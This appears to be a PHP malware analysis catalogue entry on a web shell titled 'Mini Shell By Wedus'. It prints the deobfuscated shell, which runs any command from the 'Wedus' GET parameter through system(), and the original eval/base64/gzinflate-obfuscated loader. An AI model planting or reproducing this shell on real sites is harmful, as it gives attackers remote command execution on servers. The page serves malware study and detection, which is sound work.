PHP Malware Analysis

Back to list

Tags

Title
Mini Shell By Wedus
Execution
system
Input
_GET

Deobfuscated code

<?php

// Default Password: WedusCok
$W3dus = "s9ZEAqkp+c4qGmWpRUUlxRpATnJqSryJWWpxYpJGakliTlpeZlU6bnE4q7g4taggNz85rxSdg0MNXFhBT10tvcTaXl0jJ7EsFQA=";
$Code = "Xs+6wTGdzebDJ4T71Q+MElIWR66w+KwUqj7Ym2dhF0Z7XJhGoj+G2L7wC5Qqlb3z7eMUR7smo+xHEkrZS+TQfbfQvjCTY0b1HRH/iNvATmjldGdjKW/Ety4FP8787ZzqupNWiAwSlqvwQFmZeVzxkdXHuIlia16bajqPrgB+cYPGXfQ3rAjvqoIyHz5/J14UFr5h7F1YET1I9kzFqdpv69XMRzDAwG4DNahmqYP6hVRv6Kfil4E0j1v0FaxSnKhNozsgc5w2j0RUtANMSA9Ur3v1OZ/TnC3mi8x9JRXlFtghJGB6tyTs9orcX7ev+F3+qC3gc/ROyZTTg2ajXAePK94Ip021gEc2nuhOzMluZNHCv9/cGgUJXCyQgimGFm6gGxgyuRF4XZKBlwkH45VXlnpzntu4QNW1KpRtYnmqhUtUjQcWLWqGQJ7DQDAAwMklL/cJ";
eval /* PHPDeobfuscator eval output */ {
    ?><!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Mini Shell By Wedus</title>
</head>

<body><center>

    <form>
    <label for="Password"></label>
    <input type="text" name="Wedus" placeholder="Password" />
    <input type="submit" value="Gas" />
    </form>
</center>
</body>
</html>

<?php 
    if (isset($_GET['Wedus'])) {
        echo "<pre>";
        echo system($_GET['Wedus']);
        echo "</pre>";
    }
};


Original code

<?php
// Default Password: WedusCok
$W3dus = "s9ZE\x41qkp\x2b\x634qGmWpRUUlxRp\x41TnJqSryJWWpxYpJG\x61kliTlpeZlU6\x62nE4q7g4t\x61ggNz85rxSdg0MNXFh\x42T10tv\x63T\x61Xl0jJ7EsFQ\x41\x3d";
$Code = "Xs\x2b6wTGdze\x62DJ4T71Q\x2bMElIWR66w\x2bKwUqj7Ym2dhF0Z7XJhGoj\x2bG2L7w\x435Qql\x623z7eMUR7smo\x2bxHEkrZS\x2bTQf\x62fQvj\x43TY0\x621HRH/iNv\x41TmjldGdjKW/Ety4FP8787ZzqupNWi\x41wSlqvwQFmZeVzxkdXHuIli\x6116\x62\x61jqPrg\x42\x2b\x63YPGXfQ3r\x41jvqoIyHz5/J14UFr5h7F1YET1I9kzFqdpv69XMRzD\x41wG4DN\x61hmqYP6hVRv6Kfil4E0j1v0F\x61xSnKhNozsg\x635w2j0RUt\x41NMS\x419Ur3v1OZ/Tn\x433mi8x9JRXlFtghJG\x426tyTs9or\x63X7ev\x2bF3\x2bq\x433g\x63/ROyZTTg2\x61jX\x41ePK94Ip021gE\x632nuhOzMluZNH\x43v9/\x63GgUJX\x43yQgimGFm6gGxgyuRF4XZK\x42lwkH45VXlnpzntu4QNW1KpRtYnmqhUtUjQ\x63WLWqGQJ7DQD\x41\x41wMklL/\x63J";
eval(strrev(htmlspecialchars_decode(gzinflate(base64_decode($W3dus)))));